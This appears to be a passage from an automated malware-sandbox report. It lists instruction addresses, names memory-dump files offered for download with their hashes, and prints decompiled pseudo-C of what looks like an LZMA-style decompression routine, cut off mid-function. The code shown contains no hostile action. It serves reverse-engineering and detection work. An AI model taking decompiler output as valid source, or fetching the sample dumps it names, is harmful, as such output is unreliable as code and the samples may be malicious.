                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064a1
                                                                                                                        0x004064a1
                                                                                                                        0x004064a5
                                                                                                                        0x0040696b
                                                                                                                        0x00000000
                                                                                                                        0x0040696b
                                                                                                                        0x004064ab
                                                                                                                        0x004064ae
                                                                                                                        0x004064b1
                                                                                                                        0x004064b4
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b9
                                                                                                                        0x004064bc
                                                                                                                        0x004064bf
                                                                                                                        0x004064c2
                                                                                                                        0x004064c5
                                                                                                                        0x004064c8
                                                                                                                        0x004064c9
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064ce
                                                                                                                        0x004064d1
                                                                                                                        0x004064d4
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064da
                                                                                                                        0x004064dc
                                                                                                                        0x004064dc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x004064df
                                                                                                                        0x004064df
                                                                                                                        0x00000000
                                                                                                                        0x004064df
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x004069b7
                                                                                                                        0x004069bd
                                                                                                                        0x004069bf
                                                                                                                        0x004069c6
                                                                                                                        0x004069c8
                                                                                                                        0x004069cf
                                                                                                                        0x004069d3
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x004069cc
                                                                                                                        0x004069cc
                                                                                                                        0x00000000
                                                                                                                        0x004069cc
                                                                                                                        0x00406819
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x0040676b

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                                        • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                                                        • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                                        • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
